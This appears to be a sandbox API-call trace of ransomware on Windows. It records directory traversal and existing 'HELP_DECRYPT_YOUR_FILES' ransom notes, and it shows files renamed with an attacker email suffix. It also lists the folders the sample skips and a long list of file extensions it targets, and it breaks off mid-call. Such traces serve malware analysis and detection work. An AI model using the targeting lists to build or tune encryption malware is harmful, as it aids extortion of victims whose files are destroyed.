	[0164.057] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b4e7e3d, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7b4e7e3d, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7b50e024, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0164.057] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b4c1bc6, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7b4c1bc6, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7b4e7e3d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0164.057] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7adb8cc4, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7adb8cc4, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7adb8cc4, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x5770, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="masterdescriptor.en-us.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="MASTER~1.SCL")) returned 1
	[0164.058] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd59215d7, ftCreationTime.dwHighDateTime=0x1d8a64a, ftLastAccessTime.dwLowDateTime=0xd59215d7, ftLastAccessTime.dwHighDateTime=0x1d8a64a, ftLastWriteTime.dwLowDateTime=0x341a3500, ftLastWriteTime.dwHighDateTime=0x1d0d7f0, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="s321033.hash", cAlternateFileName="S32103~1.HAS")) returned 1
	[0164.058] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b198c2e, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7b198c2e, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7b4294bb, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xd81e0, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="stream.x86.en-us.man.dat.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="STREAM~1.SCL")) returned 1
	[0164.058] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b198c2e, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7b198c2e, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7b4294bb, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xd81e0, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="stream.x86.en-us.man.dat.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="STREAM~1.SCL")) returned 0
	[0164.058] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0164.058] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0164.059] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7acd4881, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7acd4881, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7ad202e2, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0164.059] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7acad74f, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7acad74f, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7acd4881, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0164.059] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd584b1e3, ftCreationTime.dwHighDateTime=0x1d8a64a, ftLastAccessTime.dwLowDateTime=0xd587b51b, ftLastAccessTime.dwHighDateTime=0x1d8a64a, ftLastWriteTime.dwLowDateTime=0xd587b51b, ftLastWriteTime.dwHighDateTime=0x1d8a64a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="x-none.16", cAlternateFileName="")) returned 1
	[0164.059] lstrcmpW (lpString1="x-none.16", lpString2="..") returned 1
	[0164.059] lstrcmpW (lpString1="x-none.16", lpString2=".") returned 1
	[0164.059] lstrcpyW (in: lpString1=0x18a87c, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189"
	[0164.059] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\"
	[0164.059] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\", lpString2="x-none.16" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16"
	[0164.060] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16"
	[0164.060] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\"
	[0164.060] lstrcpyW (in: lpString1=0x189964, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\"
	[0164.060] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\*.*") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\*.*"
	[0164.060] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\*.*" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd584b1e3, ftCreationTime.dwHighDateTime=0x1d8a64a, ftLastAccessTime.dwLowDateTime=0xd587b51b, ftLastAccessTime.dwHighDateTime=0x1d8a64a, ftLastWriteTime.dwLowDateTime=0xd587b51b, ftLastWriteTime.dwHighDateTime=0x1d8a64a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0164.092] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\*.*") returned 90
	[0164.092] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0164.095] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\*.*", cchLength=0x5a | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\*.*") returned 0x5a
	[0164.095] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.096] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\*.*", lpSrch="windows") returned 0x0
	[0164.096] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.096] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\*.*", lpSrch="boot") returned 0x0
	[0164.096] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.096] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\*.*", lpSrch="system volume information") returned 0x0
	[0164.096] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.096] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0164.097] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.097] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\*.*", lpSrch="temp") returned 0x0
	[0164.097] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.097] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\*.*", lpSrch="program files") returned 0x0
	[0164.097] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.097] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\*.*", lpSrch="program files (x86)") returned 0x0
	[0164.097] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.098] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\*.*", lpSrch="appdata") returned 0x0
	[0164.098] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.098] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\*.*", lpSrch="application data") returned 0x0
	[0164.098] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.098] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\*.*", lpSrch="winnt") returned 0x0
	[0164.098] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.098] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\*.*", lpSrch="tmp") returned 0x0
	[0164.098] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.099] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\*.*", lpSrch="cache") returned 0x0
	[0164.099] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.099] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\*.*", lpSrch="temporary internet files") returned 0x0
	[0164.099] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.099] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\*.*", lpSrch="webcache") returned 0x0
	[0164.099] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.100] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\*.*", lpSrch="inetcache") returned 0x0
	[0164.100] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.100] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\*.*", lpSrch="nvidia") returned 0x0
	[0164.100] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.100] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\*.*", lpSrch="packages") returned 0x0
	[0164.100] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.100] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\*.*", lpSrch="cookies") returned 0x0
	[0164.101] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.101] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\*.*", lpSrch="programdata") returned 0x0
	[0164.101] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd584b1e3, ftCreationTime.dwHighDateTime=0x1d8a64a, ftLastAccessTime.dwLowDateTime=0xd587b51b, ftLastAccessTime.dwHighDateTime=0x1d8a64a, ftLastWriteTime.dwLowDateTime=0xd587b51b, ftLastWriteTime.dwHighDateTime=0x1d8a64a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="..", cAlternateFileName="")) returned 1
	[0164.101] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd585af2f, ftCreationTime.dwHighDateTime=0x1d8a64a, ftLastAccessTime.dwLowDateTime=0xd585af2f, ftLastAccessTime.dwHighDateTime=0x1d8a64a, ftLastWriteTime.dwLowDateTime=0x206dcf00, ftLastWriteTime.dwHighDateTime=0x1d0d7ee, nFileSizeHigh=0x0, nFileSizeLow=0x5220, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="MasterDescriptor.x-none.xml", cAlternateFileName="MASTER~1.XML")) returned 1
	[0164.101] lstrcmpW (lpString1="MasterDescriptor.x-none.xml", lpString2="..") returned 1
	[0164.101] lstrcmpW (lpString1="MasterDescriptor.x-none.xml", lpString2=".") returned 1
	[0164.101] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\"
	[0164.102] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\", lpString2="MasterDescriptor.x-none.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\MasterDescriptor.x-none.xml") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\MasterDescriptor.x-none.xml"
	[0164.102] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\MasterDescriptor.x-none.xml") returned 114
	[0164.102] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0164.102] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\MasterDescriptor.x-none.xml", cchLength=0x72 | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\masterdescriptor.x-none.xml") returned 0x72
	[0164.102] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.102] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\masterdescriptor.x-none.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0164.102] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\masterdescriptor.x-none.xml" | out: lpString1="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\masterdescriptor.x-none.xml") returned="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\masterdescriptor.x-none.xml"
	[0164.102] lstrlenW (lpString="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\masterdescriptor.x-none.xml") returned 114
	[0164.103] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0164.103] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.103] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0164.103] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.103] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") 